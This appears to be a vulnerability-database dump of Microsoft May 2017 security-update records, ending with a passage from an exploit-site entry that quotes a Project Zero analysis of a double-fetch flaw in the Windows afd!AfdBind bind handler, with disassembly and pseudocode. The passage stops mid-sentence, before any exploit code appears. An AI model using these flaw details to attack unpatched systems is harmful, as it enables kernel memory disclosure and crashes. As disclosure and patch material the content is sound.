English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 40,448| 08-Dec-2009| 17:55| x64 \nTcpipreg.sys| 6.0.6002.24087| 40,448| 05-Apr-2017| 14:59| x64 \nTcpip.sys| 6.0.6002.19763| 1,422,568| 05-Apr-2017| 16:26| x64 \nTcpip.sys| 6.0.6002.24087| 1,416,424| 05-Apr-2017| 15:50| x64 \n \n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 79,360| 08-Dec-2009| 17:51| IA-64 \nTcpipreg.sys| 6.0.6002.24087| 80,896| 05-Apr-2017| 14:39| IA-64 \nTcpip.sys| 6.0.6002.19763| 2,950,376| 05-Apr-2017| 15:50| IA-64 \nTcpip.sys| 6.0.6002.24087| 2,976,488| 05-Apr-2017| 15:24| IA-64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nTcpipreg.sys| 6.0.6002.18160| 30,720| 08-Dec-2009| 17:26| x86 \nTcpipreg.sys| 6.0.6002.24087| 31,232| 05-Apr-2017| 14:35| x86 \nTcpip.sys| 6.0.6002.19763| 905,960| 05-Apr-2017| 16:02| x86 \nTcpip.sys| 6.0.6002.24087| 915,176| 05-Apr-2017| 15:30| x86\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows Kernel Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175"], "modified": "2017-05-09T07:00:00", "id": "KB4018885", "href": "https://support.microsoft.com/en-us/help/4018885", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T13:21:34", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. \n \nTo learn more about the vulnerability, go to [CVE-2017-0190](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0190>).\n\n## More Information\n\nImportant \n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019206>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base:[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n### Update replacement\n\nThis update replaces previously released update 4017018.\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019206-ia64.msu| 10270F2826B7CC7FA91A74F49C6C4A78B3C35CC1| 04C29C3B8BD69E9F9B222E548EEF593B3268C03B807280AC058B15133D5B475E \nWindows6.0-KB4019206-x64.msu| 61BE798760A569E48B6868CBA5A542AB26FCAE97| 064D4435D44F36B5A9963B554EC2A5220DDEBF335BFE763CC02BB4A63918EAAF \nWindows6.0-KB4019206-x86.msu| A250DB86107696DE0A9A9BE64EB93E29833C792B| A4161C6AAF43E16776E9BBAC2FF4989ED75270CE7B4210ABEC5D0289A8EE201F \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 955,392| 07-Apr-2017| 15:41| IA-64 \nGdi32.dll| 6.0.6002.24089| 954,880| 07-Apr-2017| 15:16| IA-64 \nGdi32.dll| 6.0.6002.19765| 305,664| 07-Apr-2017| 15:56| x86 \nGdi32.dll| 6.0.6002.24089| 305,152| 07-Apr-2017| 15:25| x86 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 391,680| 07-Apr-2017| 16:18| x64 \nGdi32.dll| 6.0.6002.24089| 391,680| 07-Apr-2017| 15:43| x64 \nGdi32.dll| 6.0.6002.19765| 305,664| 07-Apr-2017| 15:56| x86 \nGdi32.dll| 6.0.6002.24089| 305,152| 07-Apr-2017| 15:25| x86 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nGdi32.dll| 6.0.6002.19765| 299,520| 07-Apr-2017| 15:54| x86 \nGdi32.dll| 6.0.6002.24089| 299,520| 07-Apr-2017| 15:23| x86\n", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows GDI Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0190"], "modified": "2017-05-09T07:00:00", "id": "KB4019206", "href": "https://support.microsoft.com/en-us/help/4019206", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T14:40:44", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Security updates to Microsoft Graphics Component, Windows COM, Windows Server, Windows Kernel and Microsoft Windows DNS.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update. \n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019214>) website.\n\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for update KB4019214](<http://download.microsoft.com/download/E/9/5/E9550DB7-A799-49F5-AD1D-A3D8EF04D86A/4019214.csv>).\n\n## More Information\n\n * This Security-Only Quality Update does not include security fixes for Internet Explorer. In order to obtain the security fixes for Internet Explorer, the Cumulative Security Update for Internet Explorer KB4018271 should also be installed. Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update, and you automatically approve all security updates classifications for deployment, this May 2017 Security-Only Quality Update KB4019214, April 2017 Security Monthly Quality Rollup KB4019216, and the Cumulative Security Update for Internet Explorer KB4018271 are deployed. We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019214 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019214", "href": "https://support.microsoft.com/en-us/help/4019214", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:40:51", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updated Windows Cryptography API to deprecate SHA-1 for SSL/TLS Server Authentication, including in Microsoft Edge and Internet Explorer 11 . See [Advisory 4010323](<https://support.microsoft.com/help/4010323>) for more information.\n * Security updates to Microsoft Graphics Component, Windows COM, Microsoft ActiveX, Windows Server, Windows kernel, and Microsoft Windows DNS.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nIf the PC uses an AMD Carrizo DDR4 processor, installing this update will block downloading and installing future Windows updates.| This issue is resovled by [KB4022722](<https://support.microsoft.com/help/4022722>). \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019263>) website.\n\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update KB4019263](<http://download.microsoft.com/download/8/A/1/8A1866D7-D539-42D2-A928-68C91B87BC49/4019263.csv>).\n\n## More Information\n\n * This Security-Only Quality Update does not include security fixes for Internet Explorer. To obtain the security fixes for Internet Explorer, Cumulative Security Update for Internet Explorer KB4018271 should also be installed. Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this May 2017 Security-Only Quality Update KB4019263, the May 2017 Security Monthly Quality Rollup KB4018271, and the Cumulative Security Update for Internet Explorer KB4014661 are deployed. We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019263 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019263", "href": "https://support.microsoft.com/en-us/help/4019263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T14:40:39", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Updated Windows Cryptography API to deprecate SHA-1 for SSL/TLS Server Authentication, including in Microsoft Edge and Internet Explorer 11. See [Advisory 4010323](<https://support.microsoft.com/help/4010323>) for more information.\n * Security updates to Microsoft Graphics Component, Microsoft Windows DNS, Windows COM, Windows Server and Windows kernel.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nThis security update introduced an issue in which, if an iSCSI target becomes unavailable, attempts to reconnect will cause a leak. Initiating a new connection to an available target will work as expected. Microsoft is researching this problem and will post more information in this article when the information becomes available. \nFor more information about this issue, see the following section.\n\n## \n\n__\n\nMore information about the iSCSI issue\n\nWindows Server 2012 R2 and Server 2016 computers that experience disconnections to iSCSI attached targets may show many different symptoms. These include, but are not limited to:\n\n * The operating system stops responding\n * You receive Stop errors (Bugcheck errors) 0x80, 0x111, 0x1C8, 0xE2, 0x161, 0x00, 0xF4, 0xEF, 0xEA, 0x101, 0x133, or 0xDEADDEAD.\n * User log on failures occur together with a \"No Logon Servers Available\" error.\n * Application and service failures occur because of ephemeral port exhaustion.\n * An unusually high number of ephemeral ports are being used by the System process.\n * An unusually high number of threads are being used by the System process.\n**Cause** \n \nThis issue is caused by a locking issue on Windows Server 2012 R2 and Windows Server 2016 RS1 computers, causing connectivity issues to the iSCSI targets. The issue can occur after installing any of the following updates:**Windows Server 2012 R2**Release date| KB| Article title \n---|---|--- \nMay 16, 2017| KB [4015553](<https://support.microsoft.com/en-us/help/4015553>)| April 18, 2017\u2014KB4015553 (Preview of Monthly Rollup) \nMay 9, 2017| KB [4019215](<https://support.microsoft.com/en-us/help/4019215>)| May 9, 2017\u2014KB4019215 (Monthly Rollup) \nMay 9, 2017| KB [4019213](<https://support.microsoft.com/en-us/help/4019213>)| May 9, 2017\u2014KB4019213 (Security-only update) \nApril 18, 2017| KB [4015553](<https://support.microsoft.com/en-us/help/4015553>)| April 18, 2017\u2014KB4015553 (Preview of Monthly Rollup) \nApril 11, 2017| KB [4015550](<https://support.microsoft.com/en-us/help/4015550>)| April 11, 2017\u2014KB4015550 (Monthly Rollup) \nApril 11, 2017| KB [4015547](<https://support.microsoft.com/en-us/help/4015547>)| April 11, 2017\u2014KB4015547 (Security-only update) \nMarch 21, 2017| KB [4012219](<https://support.microsoft.com/en-us/help/4012219>)| March 2017 Preview of Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2 \n**Windows Server 2016 RTM (RS1) **Release date| KB| Article title \n---|---|--- \nMay 16, 2017| KB [4023680](<https://support.microsoft.com/en-us/help/4023680>)| May 26, 2017\u2014KB4023680 (OS Build 14393.1230) \nMay 9, 2017| KB [4019472](<https://support.microsoft.com/en-us/help/4019472>)| May 9, 2017\u2014KB4019472 (OS Build 14393.1198) \nApril 11, 2017| KB [4015217](<https://support.microsoft.com/en-us/help/4015217>)| April 11, 2017\u2014KB4015217 (OS Build 14393.1066 and 14393.1083) \n \n**Verification**\n\n * Verify the version of the following MSISCSI driver on the system: \n \nc:\\windows\\system32\\drivers\\msiscsi.sys \n \nThe version that will expose this behavior is 6.3.9600.18624 for Windows Server 2012 R2 and version 10.0.14393.1066 for Windows Server 2016.\n * The following events are logged in the System log:Event source| ID| Text \n---|---|--- \niScsiPrt| 34| A connection to the target was lost, but the Initiator successfully reconnected to the target. Dump data contains the target name. \niScsiPrt| 39| The Initiator sent a task management command to reset the target. The target name is given in the dump data. \niScsiPrt| 9| Target did not respond in time for a SCSI request. The CDB is given in the dump data. \n * Review the number of threads that are running under the System process, and compare this to a known working baseline.\n * Review the number of handles that are currently opened by the System process, and compare this to a known working baseline.\n * Review the number of ephemeral ports that are being used by the System process.\n * From an administrative Powershell, run the following command: \n \n**Get-NetTCPConnection | Group-Object -Property State, OwningProcess | Sort Count** \n \nOr, from an administrative CMD prompt, run the following NETSTAT command together with the \"Q\" switch. This shows \"bound\" ports that are no longer connected: \n \n**NETSTAT \u2013ANOQ ** \n \nFocus on ports that are owned by the SYSTEM process. \n \nFor the three previous points, anything more than 12,000 should be considered suspect. If iSCSI targets are present in the computer, there is high probability that the issue will occur.\n**Resolution** \n \nIf the event logs indicate that many reconnections are occurring, work with your iSCSI and network fabric vendor to help diagnose and correct the reason for the failure to maintain connections to iSCSI targets. Make sure that iSCSI targets can be accessed over the current network fabric. Install updated fixes when they become available. This article will be updated with the specific KB article number of the fix to install when it becomes available. \n \n**Note** We do not recommend that you uninstall any of the March, April, May, or June security rollups. Doing so will expose the computers to known security exploits and other bugs that are mitigated by monthly updates. We recommend that you first work with iSCSI target and network vendors to resolve the connectivity issues that are triggering target reconnects.\n\nHow to get this updateThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019213>) website.\n\n * **Prerequisites** \nTo apply this update, you must have Windows 8.1 and Windows Server 2012 R2 update: April 2014 (KB2919355) installed.\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update KB4019213](<http://download.microsoft.com/download/B/F/E/BFE0248F-716F-4CEF-8312-6AA0B5D69DE5/4019213.csv>).\nMore Information\n * This security-only quality update does not include security fixes for Internet Explorer. In order to obtain the security fixes for Internet Explorer, the Cumulative Security Update for Internet Explorer KB4018271 should also be installed. Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, the May 2017 Security-Only Quality Update KB4019213, May 2017 Security Monthly Quality Rollup KB4019215, and the Cumulative Security Update for Internet Explorer KB4018271 are deployed. We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019213 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019213", "href": "https://support.microsoft.com/en-us/help/4019213", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T13:21:25", "description": "None\n## Summary\n\nAn elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver handles objects in memory incorrectly. An attacker who successfully exploits the vulnerability could obtain information to further compromise the user\u2019s system. On computers that have 64-bit Windows 7 or later systems installed, this vulnerability can lead to a denial of service. \n \nTo learn more about the vulnerability, go to [CVE-2017-0077](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0077>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019149>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019149-ia64.msu| 7809D37527DAA1B986B134D2068CC2C88A3A5803| B6F7F80BC80BA191CDDC42E9C3A738067CDB1F83D03F236D0CEC6AB00C8FCCB0 \nWindows6.0-KB4019149-x64.msu| 39AE9056E4D6CDD7AEAC4C6224E4062C8F7DEBEC| A3E055FEE19A4DC7EB3B9CF25E216004B5C710AFE9BBAD34F93BE30DA872319C \nWindows6.0-KB4019149-x86.msu| 4D038001037EF245542CF1A7EA51654BE9ED8BB8| 61EA0FE4CCA0BD69D8893C5A3ACD627F9EDF6E21F9AC94A02E2B6BE4BD45D2EC \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18823| 105,984| 13-Apr-2013| 03:48| IA-64 \nDxgkrnl.sys| 7.0.6002.19765| 2,008,808| 07-Apr-2017| 15:58| IA-64 \nCdd.dll| 7.0.6002.24089| 105,984| 07-Apr-2017| 15:16| IA-64 \nDxgkrnl.sys| 7.0.6002.24089| 2,008,808| 07-Apr-2017| 15:44| IA-64 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18392| 47,104| 20-Jan-2011| 16:12| x64 \nDxgkrnl.sys| 7.0.6002.19765| 901,352| 07-Apr-2017| 16:25| x64 \nCdd.dll| 7.0.6002.24089| 47,104| 07-Apr-2017| 15:42| x64 \nDxgkrnl.sys| 7.0.6002.24089| 901,352| 07-Apr-2017| 15:50| x64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18392| 37,376| 20-Jan-2011| 16:02| x86 \nDxgkrnl.sys| 7.0.6002.19765| 638,184| 07-Apr-2017| 16:08| x86 \nCdd.dll| 7.0.6002.24089| 37,376| 07-Apr-2017| 15:22| x86 \nDxgkrnl.sys| 7.0.6002.24089| 638,184| 07-Apr-2017| 15:30| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Dxgkrnl.sys Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019149", "href": "https://support.microsoft.com/en-us/help/4019149", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-16T09:10:03", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0220", "CVE-2017-0175"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27774", "href": "https://0day.today/exploit/description/27774", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1127\r\n \r\nWe have identified two related bugs in Windows kernel code responsible for implementing the bind() socket function, specifically in the afd!AfdBind and tcpip!TcpBindEndpoint routines. They both can lead to reading beyond the allocated pool-based buffer memory area, potentially allowing user-mode applications to disclose kernel-mode secrets. They can also be exploited to trigger a blue screen of death and therefore a Denial of Service condition.\r\n \r\nThe details are explained below.\r\n \r\n----------[ Double-fetch in afd!AfdBind ]----------\r\n \r\nIn the code of the afd!AfdBind function of the up-to-date afd.sys module (handler of the AFD_BIND IOCTL accessible from ring-3) on Windows 7 32-bit, we can find the following assembly code construct:\r\n \r\n--- cut ---\r\n PAGE:00024D71 push 0EC646641h ; Tag\r\n PAGE:00024D76 push [ebp+NumberOfBytes] ; NumberOfBytes\r\n PAGE:00024D79 push 10h ; PoolType\r\n PAGE:00024D7B call ds:[email\u00a0protected]\r\n [...]\r\n PAGE:00024DD2 lea edi, [eax+4]\r\n PAGE:00024DD5 push edi ; void *\r\n PAGE:00024DD6 push [ebp+P] ; void *\r\n PAGE:00024DD9 call ds:__imp__memmove <------------------- Fetch #1\r\n PAGE:00024DDF add esp, 0Ch\r\n PAGE:00024DE2 movzx eax, word ptr [edi] <----------------- Fetch #2\r\n PAGE:00024DE5 cmp ax, 22h\r\n PAGE:00024DE9 jb short loc_24E01\r\n [...]\r\n PAGE:00024E01\r\n PAGE:00024E01 loc_24E01:\r\n PAGE:00024E01 push eax\r\n PAGE:00024E02 call [email\u00a0protected] ; SOCKADDR_SIZE(x)\r\n PAGE:00024E07 movzx eax, al\r\n PAGE:00024E0A cmp [ebp+NumberOfBytes], eax\r\n PAGE:00024E0D jnb short loc_24E25\r\n--- cut ---\r\n \r\nWhich translates to the following pseudo-code:\r\n \r\n--- cut ---\r\n LPINPUTSTRUCT lpKernelStruct = ExAllocatePool(NumberOfBytes);\r\n memmove(lpKernelStruct, lpUserStruct, NumberOfBytes); <-------------------- Fetch #1\r\n \r\n if (NumberOfBytes < SOCKADDR_SIZE(lpUserStruct->dwStructType)) { <--------- Fetch #2\r\n // Bail out.\r\n }\r\n--- cut ---\r\n \r\nAs can be seen, the first WORD of the input structure is fetched twice from a user-mode buffer: once during the memmove() call, and once when directly accessing it to pass its value 